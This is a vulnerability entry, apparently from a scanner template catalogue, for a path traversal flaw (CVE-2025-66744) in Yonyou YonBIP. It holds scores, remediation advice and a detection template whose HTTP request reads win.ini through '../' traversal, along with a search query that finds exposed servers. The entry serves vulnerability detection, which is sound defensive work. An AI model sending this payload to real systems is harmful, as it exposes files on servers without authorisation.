Yonyou YonBIP - Path Traversal
CVE-2025-66744
Verified
Description
Yonyou YonBIP v3 and before contains a path traversal caused by improper validation in the LoginWithV8 interface of the series data application service system, letting unauthorized attackers access sensitive information.
Severity
High
CVSS Score
7.5
Exploit Probability
6%
Published Date
February 10, 2026
Template Author
dhiyaneshdk
CVE-2025-66744.yaml
id: CVE-2025-66744
info:
name: Yonyou YonBIP - Path Traversal
author: DhiyaneshDk
severity: high
description: |
Yonyou YonBIP v3 and before contains a path traversal caused by improper validation in the LoginWithV8 interface of the series data application service system, letting unauthorized attackers access sensitive information.
impact: |
Unauthorized attackers can access sensitive system information, potentially leading to data exposure.
remediation: |
Update to the latest version beyond v3.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-66744
- https://github.com/iSee857/YonYouBip-path-travel
classification:
cve-id: CVE-2025-66744
epss-score: 0.05595
epss-percentile: 0.90402
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
metadata:
max-request: 1
verified: true
fofa-query: body="YonBIP | 数据应用服务"
tags: cve,cve2025,yonbip,lfi,vkev
http:
- raw:
- |
GET /bi/api/Portal/LoginWithV8/?ticket=/../../../../Windows/win.ini HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip
matchers-condition: and
matchers:
- type: word
part: body
words:
- "[fonts]"
- "[extensions]"
- "Message"
condition: and
- type: status
status:
- 200
# digest: 490a0046304402205f0b4f0cc9c9d0904dae6488b3af191f158fb01ebab16e6e04d78da0e6fc2ef202200afb2a2e6ca79ff4510fd6036fce427cd8c40f1b5e67310bd316c6dfb06b4f0a:922c64590222798bb761d5b6d8e729507.5Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2025-66744
Remediation Steps
Update to the latest version beyond v3.